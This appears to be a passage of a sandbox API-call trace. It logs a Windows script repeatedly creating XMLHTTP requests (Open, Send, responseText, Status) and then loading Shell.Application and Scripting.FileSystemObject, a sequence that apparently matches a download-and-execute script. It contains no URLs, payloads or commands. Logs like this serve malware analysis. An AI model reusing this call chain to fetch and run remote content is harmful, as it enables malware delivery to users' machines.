	[0731.146] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0731.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0731.146] longjmp () 
	[0731.147] longjmp () 
	[0731.147] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0731.147] SysStringLen (param_1=0x0) returned 0x0
	[0731.147] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0731.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0731.147] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0731.147] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0731.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0731.147] ??2@YAPEAX_K@Z () returned 0x62f310
	[0731.147] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0731.147] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0731.147] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0731.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0731.148] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0731.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0731.148] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0731.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0731.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0731.148] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0731.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0733.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0733.579] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0733.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0733.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0733.579] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0733.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0733.580] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0733.580] SysStringLen (param_1=0x0) returned 0x0
	[0733.580] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0733.580] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0733.580] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0733.580] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0733.580] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0733.580] ??2@YAPEAX_K@Z () returned 0x62f350
	[0733.580] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0733.580] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0733.580] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0733.580] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0733.580] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0733.581] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0733.581] SysStringLen (param_1=0x0) returned 0x0
	[0733.581] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0733.588] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0733.588] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0733.588] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0733.588] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0733.588] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0733.588] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0735.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0735.707] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0735.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0735.708] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0735.708] SysStringLen (param_1=0x0) returned 0x0
	[0735.709] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0735.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0735.709] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0735.709] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0735.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0735.709] ??2@YAPEAX_K@Z () returned 0x62f310
	[0735.709] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0735.709] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0735.709] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0735.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0735.709] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0735.710] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0735.710] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0735.712] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0735.713] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0735.713] SysStringLen (param_1=0x0) returned 0x0
	[0735.713] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0735.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0735.713] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0735.713] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0735.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0735.713] ??2@YAPEAX_K@Z () returned 0x62f330
	[0735.713] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f330) 
	[0735.713] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0735.713] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0735.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0735.714] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0735.714] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0735.714] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0735.714] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0735.714] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0735.714] SysStringLen (param_1=0x0) returned 0x0
	[0735.714] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0735.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0735.715] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0735.715] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0735.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0735.715] ??2@YAPEAX_K@Z () returned 0x62f310
	[0735.715] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0735.715] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0735.715] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0735.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0735.715] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0735.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
